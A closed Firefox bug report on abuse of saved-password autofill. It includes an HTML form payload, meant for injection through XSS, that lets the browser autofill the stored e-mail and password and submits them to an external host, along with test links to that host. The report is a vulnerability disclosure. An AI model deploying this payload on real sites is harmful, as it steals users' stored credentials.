Closed Bug 1312769 Opened 8 years ago Closed 8 years ago

Disclosure of browser password and e-mail for site

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
49 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1118511

People

(Reporter: gninrepoli, Unassigned)

Details

Attachments

(3 files)

1.JPG
39.83 KB, image/jpeg
Details
2.JPG
48.61 KB, image/jpeg
Details
3.jpg
35.60 KB, image/jpeg
Details
Attached image 1.JPG
User Agent: Mozilla/5.0 (Windows NT 5.1; rv:49.0) Gecko/20100101 Firefox/49.0 Build ID: 20161019084923 Steps to reproduce: When you click on the button "Remember" (Look at 2.jpg), your password, email, phone number, etc., will remain in the browser. Suppose you found on the website XSS. You can write the following code: <form action="http://piwik.netne.net/enter.html" class="t1-form signin" method="get"> <input id="signin-email" class="text-input email-input" name="session[username_or_email]" autocomplete="username" placeholder="E-mail" type="text"> <input id="signin-password" class="text-input flex-table-input" name="session[password]" placeholder="Pass" autocomplete="current-password" type="password"> <button type="submit" class="submit btn primary-btn flex-table-btn js-submit"> Enter </button> </form> ----------------------------------------------------------------------------- and steal confidential information that has been stored in the browser if the victim is held by the above-described code page. Link for testing: http://piwik.netne.net/enter.html Actual results: Stole password and e-mail from site. Expected results: Like at the 1.jpg
Attached image 2.JPG
Attached image 3.jpg
http://piwik.netne.net/enter_1.html - with hidden fields
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: